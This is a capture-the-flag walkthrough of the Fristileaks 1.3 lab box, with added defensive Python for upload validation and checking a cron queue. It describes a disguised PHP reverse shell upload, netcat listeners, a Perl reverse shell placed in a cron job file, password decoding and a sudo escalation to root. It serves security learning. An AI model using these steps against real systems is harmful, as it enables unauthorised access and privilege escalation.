Fristileaks 1.3

Vulnhub virtual machine; OSCP prep box, and a very interesting one indeed. This box includes a few hints and clues sprinkled around a web application, then pivots through multiple user escalations alongside decryption of ciphertext, leading to eventual root.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Initial Setup Note: When booting this VM ensure your virtualization software uses the MAC address 08:00:27:A5:A6:76. I probably spent way more time than I’d like to admit troubleshooting networking issues, more than I really should have. #fundamentalsofreading

Discover VM on network:

netdiscover -r 192.168.56.0/24

Enumeration

Nmap Scan:

nmap -sV -sC -oA nmap/fristileaks 192.168.56.109

robots.txt lists some interesting disallowed directories.

Navigate to webserver:

Not my favorite color, but we have a list of usernames and a date of 2015.

Users:

@meneer, 
@barrebas, 
@rikvduijn, 
@wez3forsec, 
@PyroBatNL, 
@0xDUDE, 
@annejanbrouwer, 
@Sander2121, 
Reinierk, 
@DearCharles, 
@miamat, 
MisterXE, 
BasB, 
Dwight, 
Egeltje, 
@pdersjant, 
@tcp130x10, 
@spierenburg, 
@ielmatani, 
@renepieters, 
Mystery guest, 
@EQ_uinix, 
@WhatSecurity, 
@mramsmeets, 
@Ar0xA

Might be helpful in the future.

Source:

First clue in the page source: the goal is root, and the box is estimated at 4 hours to complete.

Investigate the robots.txt disallowed directories, starting with http://192.168.56.109/cola

Download the image locally to investigate for steganography:

file 3037440.jpg

strings 3037440.jpg

Nothing like an embedded .zip or similar stands out so far.

The other disallowed directories, /sisi/ and /beer/, both serve the same image.

Since all of these directories are named after drinks and we were told to “keep calm and drink fristi”, maybe a /fristi/ directory exists.

Navigate to /fristi/

Attempt basic logins first: admin/admin, root/password, etc.

Met with a whole lot of “wrong username or password”

SQL-injection time

Content filtering is occurring, good job webadmin.

View source:

Well hello, base64-encoded image.

Decode the base64: first save the blob from the page source into a file (b64code):

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Decode:

cat b64code | base64 --decode

The decoded output starts with a PNG header, so let's redirect the decoded bytes into a .png file:

cat b64code | base64 --decode > decode.png

Well, this is turning into a bit of a Drake “keke” song. The image resolves to keKkeKKeKKeKkEkkEk

Since eezeepz was the one that left the message, let's try to log in as that user.

We are in like fine swimwear! The application is PHP-based and has a file upload, so let's try uploading a reverse shell.

Attempt to upload shell.php:

We will need to disguise our shell as an image.

Made modifications to the file name and Content-Type, and added GIF89a; at the start of the file.

File filter bypassed; the file is uploaded to the /uploads/ directory.
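Two steps above rely on the same idea, inspecting the leading bytes of a blob: the base64 blob from the page source was recognised as a PNG by its header, and the upload filter was satisfied by a file that merely starts with GIF89a;. The following script is an added example (not code from the original post or from the Fristileaks box) showing, from the webadmin's side, how a magic-byte sniffer identifies a decoded blob and why a signature check alone is not enough for an upload filter. The signature table, the allow-lists, the SCRIPT_MARKERS list and the sample files are all constructed for the example.

```python
import base64
from typing import List, Optional

# Leading-byte signatures for the formats that came up on this box: the
# decoded base64 blob was a PNG, strings on the JPEG found nothing ZIP-like,
# and the upload filter was fooled by a "GIF89a;" prefix. Constructed table.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
}

ALLOWED_EXTENSIONS = {"png", "gif", "jpeg", "jpg"}
ALLOWED_CONTENT_TYPES = {"image/png", "image/gif", "image/jpeg"}

# Fragments a server-side engine would interpret if the upload directory is
# executable; compared case-insensitively against the whole body.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def sniff(data: bytes) -> Optional[str]:
    """Identify content by its leading bytes, ignoring name and headers."""
    for signature, kind in MAGIC.items():
        if data.startswith(signature):
            return kind
    return None


def sniff_base64(blob: str) -> Optional[str]:
    """Decode a base64 blob (as pasted out of page source) and sniff it."""
    return sniff(base64.b64decode(blob))


def validate_upload(filename: str, content_type: str, data: bytes) -> List[str]:
    """Return the reasons to reject an upload; an empty list means accept.

    Name, Content-Type and body all come from the client, so every check is
    made server-side and the body checks do not trust the other two fields.
    """
    problems = []
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    # Only the last extension counts: "shell.php.gif" is judged as .gif here
    # and then caught by the body checks below, not by its name.
    if ext not in ALLOWED_EXTENSIONS:
        problems.append(f"extension {ext!r} not allowed")
    if content_type not in ALLOWED_CONTENT_TYPES:
        problems.append(f"content-type {content_type!r} not an image")
    kind = sniff(data)
    expected = "jpeg" if ext == "jpg" else ext
    if kind is None:
        problems.append("no recognised image signature")
    elif kind != expected:
        problems.append(f"signature says {kind}, name says {expected or 'nothing'}")
    body = data.lower()
    for marker in SCRIPT_MARKERS:
        if marker in body:
            problems.append(f"embedded script marker {marker!r}")
            break
    return problems


# Constructed samples: a minimal PNG-signature blob, the same blob as it would
# appear base64-encoded in page source, and a "GIF89a;" disguised PHP file
# with the script body left out.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PNG_B64 = base64.b64encode(SAMPLE_PNG).decode()
DISGUISED_PHP = b"GIF89a;\n<?php /* script body omitted */ ?>\n"

if __name__ == "__main__":
    print("decoded blob is:", sniff_base64(SAMPLE_PNG_B64))
    for name, ctype, body in [
        ("cat.png", "image/png", SAMPLE_PNG),
        ("shell.php.gif", "image/gif", DISGUISED_PHP),
        ("shell.php", "application/x-php", b"<?php /* omitted */ ?>"),
    ]:
        print(name, "->", validate_upload(name, ctype, body) or "accepted")
```

Note that the disguised file passes the extension, Content-Type and signature checks exactly as it did on the box; only the body scan rejects it. Marker scanning is defence in depth, not the fix: the durable mitigations are serving uploads from a location where the web server does not execute scripts and re-encoding images on the server so that no client-supplied bytes are stored verbatim.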

Ensure listener is setup

nc -lvnp 9000

SHELL/RCE

Launch shell.php.gif

Upgrade the partial shell to a full tty (Python method):

python -c 'import pty; pty.spawn("/bin/bash")'
press Ctrl+Z
stty raw -echo
fg (enter)

Priv-Esc

Start the quest to enumerate and elevate privileges on box.

uname -a

Search for known vulnerabilities for the 2.6.32 kernel:

searchsploit 2.6.32

Looks like we found some priv-esc code... anddddd this has turned out not to be helpful.

Running my enum scripts:

Interesting avenues to take.

Continue enumerating user home directories: found notes.txt in eezeepz's home directory.

bash-4.1$ cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

Jerry left this note: any commands placed in /tmp/runthis get executed under his account by a cron job.
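The note describes a privileged cron runner that reads commands from a file in /tmp and only restricts which directories the binaries may come from. The script below is an added example (not code from the original post or from the box) of the checks such a runner would need before executing anything from a shared directory: a per-line policy that applies the note's own "full path, allowed directory" rule and the rule it is missing (no interpreters, since /usr/bin/perl turns the directory allow-list into arbitrary code), and file checks that reject a queue file which is not owned by the runner's user, is writable by others, or is a symlink. ALLOWED_DIRS comes from the note; the INTERPRETERS set and the sample queue are assumptions constructed for the example.

```python
import os
import shlex
import stat
import tempfile
from typing import Dict, List, Tuple

# Directories the note allows binaries to be taken from.
ALLOWED_DIRS = ("/usr/bin/", "/home/admin/")
# Binaries that execute whatever they are handed. Permitting their directory
# permits arbitrary code, so a runner must allow-list individual binaries,
# never whole directories. Assumed list, not from the original post.
INTERPRETERS = {"perl", "python", "python2", "python3", "ruby", "sh", "bash",
                "dash", "env"}


def check_command(line: str) -> Tuple[bool, str]:
    """Apply the note's own rule (full path, allowed directory) plus the rule
    it is missing (no interpreters) to one line of the queue file."""
    try:
        argv = shlex.split(line, comments=True)
    except ValueError as exc:
        return False, f"unparseable: {exc}"
    if not argv:
        return True, "blank"
    binary = argv[0]
    if not binary.startswith("/"):
        return False, f"{binary}: not a full path"
    if not binary.startswith(ALLOWED_DIRS):  # str.startswith accepts a tuple
        return False, f"{binary}: outside allowed directories"
    if os.path.basename(binary) in INTERPRETERS:
        return False, f"{binary}: interpreter, runs arbitrary code"
    return True, "ok"


def queue_file_problems(path: str, expected_uid: int) -> List[str]:
    """Checks a privileged runner should make before trusting a queue file
    that lives in a shared directory such as /tmp."""
    problems = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        problems.append("is a symlink")
    if st.st_uid != expected_uid:
        problems.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("writable by group or others")
    parent = os.lstat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable without sticky bit")
    return problems


# Constructed queue lines in the format the note describes, one command each.
SAMPLE_QUEUE = [
    "/usr/bin/df -h",                # what the note intends
    "df -h",                         # no full path
    "/bin/ls /home",                 # outside the allowed directories
    "/usr/bin/perl /tmp/prs.pl",     # allowed directory, but an interpreter
]


def demo() -> Dict[str, object]:
    """Run both checks: the line policy on SAMPLE_QUEUE, and the file checks
    on a temporary copy first left world-writable, then made private."""
    verdicts = {line: check_command(line) for line in SAMPLE_QUEUE}
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "runthis")
    with open(path, "w") as fh:
        fh.write("\n".join(SAMPLE_QUEUE) + "\n")
    os.chmod(path, 0o666)
    loose = queue_file_problems(path, os.getuid())
    os.chmod(path, 0o644)
    tight = queue_file_problems(path, os.getuid())
    os.remove(path)
    os.rmdir(workdir)
    return {"verdicts": verdicts, "world_writable": loose, "private": tight}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The ownership check is the one that matters most here: a runner that executes a file another user is meant to write has, by design, handed that user its privileges, and no directory allow-list changes that.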

Let's drop a reverse shell in there and see if we can escalate to Jerry's account.

Creating Perl-Reverse-Shell

Made modifications needed.

Setup new listener on 9001

nc -lvnp 9001

Download the script to /tmp.

Write the command that runs the Perl script into a new file named runthis:

echo "/usr/bin/perl /tmp/prs.pl" > runthis

We are now Admin

Upgrade to a full tty again.

As in our previous encounter, the home directory is where the escalation path was found, so now investigate /home/admin.

Interesting files exist here *cryptedpass.txt* , cryptpass.py and whoisyourgodnow.txt.

Cat interesting files:

Based on the Python script, the contents seem to be base64-encoded, rot13'd and reversed.

Reconstructing cryptpass.py as a decoder:

# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
# Inverse of cryptpass.py: the stored value is base64, rot13'd and reversed,
# so undo the reversal and the rot13 (they commute), then the base64.
import base64, codecs, sys

def encodeString(text):
    decode = codecs.decode(text[::-1], 'rot13')
    return base64.b64decode(decode).decode()

cryptoResult = encodeString(sys.argv[1])
print(cryptoResult)

Run the script against both ciphertexts:

python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
python cryptpass.py mVGZ3O3omkJLmy2pcuTq

We now have plaintext passwords.

Use the recovered password to su to fristigod.

A quick sudo -l to see what fristigod is allowed to run:

We have a *.secret_admin_stuff/doCom* file, which looks very interesting.

Checking the .bash_history

We see a lot of activity involving a user *fristi*.

Root

Attempt to run doCom as the fristi user:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

well well….

Running doCom as its usage message indicates, but with /bin/sh as the command.

Bring me the Root!

-exec